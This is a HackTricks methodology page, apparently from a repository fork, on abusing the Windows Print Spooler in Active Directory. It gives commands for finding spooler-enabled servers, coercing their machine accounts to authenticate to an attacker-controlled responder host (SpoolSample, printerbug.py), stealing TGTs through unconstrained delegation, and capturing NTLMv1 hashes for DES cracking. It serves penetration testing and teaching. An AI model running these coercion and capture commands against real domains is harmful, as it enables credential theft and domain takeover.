coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
229d75d9f7
hacktricks/windows/active-directory-methodology/printers-spooler-service-abuse.md

3.7 KiB
Raw Blame History

Printers Spooler Service abuse

If the Print Spooler service is enabled, you can use some already known AD credentials to request to the Domain Controllers print server an update on new print jobs and just tell it to send the notification to some system.
Note when printer send the notification to an arbitrary systems, it needs to authenticate against that system. Therefore, an attacker can make the Print Spooler service authenticate against an arbitrary system, and the service will use the computer account in this authentication.

Finding Windows Servers on the domain

Using Powershell, get a list of Windows boxes. Servers are usually priority, so lets focus there:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

Finding Spooler services listening

Using a slightly modified @mysmartlogin's Vincent Le Toux's SpoolerScanner, see if the Spooler Service is listening:

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

Ask the service to authenticate against an arbitrary host

You can compile SpoolSample from here.

SpoolSample.exe <TARGET> <RESPONDERIP>

or use 3xocyte's dementor.py or printerbug.py if you're on Linux

python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>

Combining with Unconstrained Delegation

If an attacker has already compromised a computer with Unconstrained Delegation, the attacker could make the printer authenticate against this computer. Due to the unconstrained delegation, the TGT of the computer account of the printer will be saved in the memory of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to retrieve this ticket and abuse it [Pass the Ticket](pass-the-ticket.md).

NTLMv1 attack

Nowadays is becoming less common to find environments with Unconstrained Delegation configured, but this doesn't mean you can't abuse a Print Spooler service configured.

You could abuse some credentials/sessions you already have on the AD to ask the printer to authenticate against some host under your control. Then, using metasploit auxiliary/server/capture/smb or responder you can set the authentication challenge to 112233445566778899, capture the authentication attempt, and if it was done using NTLMv1 you will be able to crack it.
If you are using responder you could try to use the flag --lm to try to downgrade the authentication.
Note that for this technique the authentication must be performed using NTLMv1 NTLMv2 is not valid.

Remember that the printer will use the computer account during the authentication, and computer accounts use long and random passwords that you probably won't be able to crack using common dictionaries. But the NTLMv1 authentication uses DES [more info here](../ntlm/#ntlmv1-challenge), so using some services specially dedicated to cracking DES you will be able to crack it you could use [https://crack.sh/](https://crack.sh/) for example.